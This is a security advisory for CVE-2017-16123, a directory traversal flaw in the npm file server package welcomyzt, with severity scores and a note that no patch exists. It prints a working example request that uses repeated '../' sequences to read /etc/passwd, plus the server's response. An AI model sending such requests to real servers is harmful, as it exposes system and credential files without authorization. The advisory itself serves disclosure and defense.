CVE-2017-16123 – welcomyzt
Package
Manager: npm
Name: welcomyzt
Vulnerable Version: >=0.0.0
Severity
Level: High
CVSS v3.1: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS: 0.00561 pctl0.67366
Details
Directory Traversal in welcomyzt `welcomyzt` is a simple file server. `welcomyzt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing `../` in the url. **Example request:** ```http GET /../../../../../../../../../../etc/passwd HTTP/1.1 host: localhost ``` and server Response: ```http HTTP/1.1 200 OK Date: Thu, 04 May 2017 23:59:18 GMT Connection: keep-alive Transfer-Encoding: chunked {contents of /etc/passwd} ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
Metadata
Created: 2020-09-01T17:23:53Z
Modified: 2023-09-11T16:37:05Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-8fv7-vm2p-5495/GHSA-8fv7-vm2p-5495.json
CWE IDs: ["CWE-22"]
Alternative ID: GHSA-8fv7-vm2p-5495
Finding: F063
Auto approve: 1